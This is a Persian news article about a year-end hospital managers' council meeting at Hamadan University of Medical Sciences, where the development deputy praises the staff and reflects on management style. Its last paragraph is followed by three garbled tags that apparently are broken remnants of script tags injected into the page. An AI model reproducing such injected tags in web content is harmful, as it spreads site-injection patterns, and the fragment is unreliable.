برگزاری جلسه شورای مدیران بیمارستان های دانشگاه در آخرین روزهای سال ۹۷

جلسه شورای مدیران بیمارستان های دانشگاهی استان در آخرین روزهای سال ۹۷ با حضور مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه ، مهندس بهروز رحیمی ضمن تشریح گزارش عملکرد معاونت توسعه دانشگاه بیان کرد : باوجود همه پستی و بلندی ها در سال ۹۷ ، دانشگاه علوم پزشکی همدان نمره قابل قبولی را در زمینه های مختلف به خود اختصاص داد و مجموعه معاونت توسعه دانشگاه دستاوردهای چشمگیری را در حوزه های مختلف داشته است.

معاون توسعه مدیریت و منابع دانشگاه ضمن اشاره به اقدامات برجسته معاونت توسعه از جمله پرداخت های به موقع کارانه پزشکان و پرسنل ، خرید اقلام و تجهیزات مصرفی و موردنیاز ، پیشرفت چشمگیر پروژه های عمرانی و عدم توقف آنان، بارگزاری برنامه استراتژیک در خصوص انبارداری نوین و …که منجر به برقراری آرامش در سطح دانشگاه شده است ، به توانمندی های مدیران این مجموعه نیز اشاره کرد.

وی ضمن اشاره به استفاده از مدیریت آرامش در زمان های پر تلاتم و روزهای سخت اقتصادی اظهار داشت: مدیریت آرامش مدیریتی است که در شرایط پر تلاطم و سخت بتواند همه پرسنل را در مسیری هدایت کند که سختی های موجود را درک کنند اما تحت شعاع ناملایمتی های آن قرارنگیرند و هم چنان در مسیر تعالی سازمانی و مدیریت مجموعه خود به دور از هر تنش و استرسی ادامه راه دهند.

وی در ادامه با تاکید بر اهمیت نیروی انسانی در مجموعه دانشگاه بعنوان سرمایه های انسانی، بر لزوم توجه به این حوزه بخصوص حقوق و مزایا آنان تاکید کرد.

معاون توسعه دانشگاه  بر لزوم صداقت در گفتار و شفافیت در عملکرد تاکید کرد و این مولفه ها را از عوامل موفقیت هر سازمانی دانسته و دستاوردهای برجسته معاونت توسعه در سال جاری را برگرفته از این چشم انداز دانست و خاطرنشان کرد که مدیریت موثر ، مدیریتی است که در هر لحظه واز مدت زمان باقی مانده اش، در سازمان و مجموعه خود تاثیرات مثبتی بر جا بگذارد.

وی ضمن تاکید بر اعتماد به پرسنل کارآزموده در تصمیم گیری ها اظهار داشت: تصمیم گیری های خود را باید در جمع پرسنل کارآزموده و متعهد به مسائل اخلاقی و شغلی گرفت و از اعتماد کردن به آنان هیچ بیمی نباید داشت چرا که افراد متعهد و توانمند همیشه تیم و مجموعه را به سوی تعالی قرار میدهند و با حفظ کیان هر مجموعه ای آن را در مسیر صحیح هدایت می کنند.

وی ضمن اشاره به مدیریت مهربانانه اما قاطعانه عنوان کرد: مدیران هر مجموعه ای به تعبیری از دیدگاه من باید در هر شرایطی با ملایمت و با متانت رفتار کنند اما در تصمیم گیری ها قاطعیت را فراموش نکنند. درهر تصمیمی باید با هم فکری مجموعه قدمی متفکرانه بردارند و قاطعانه در آن تصمیم مصمم باشند تا بتوانند مدار مدیریتی خود را حفظ کنند که این از بهترین روش های مدیریتی نوین است.

مهندس بهروز رحیمی در خاتمه ، این جلسه را یکی از بهترین جلسات اخیر در سطح جلسات شورای مدیران بیمارستان ها قلمداد کرد و با اهدا لوح از تمامی زحمات و تلاش های مدیران بیمارستان های دانشگاهی استان همدان تقدیر کرد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *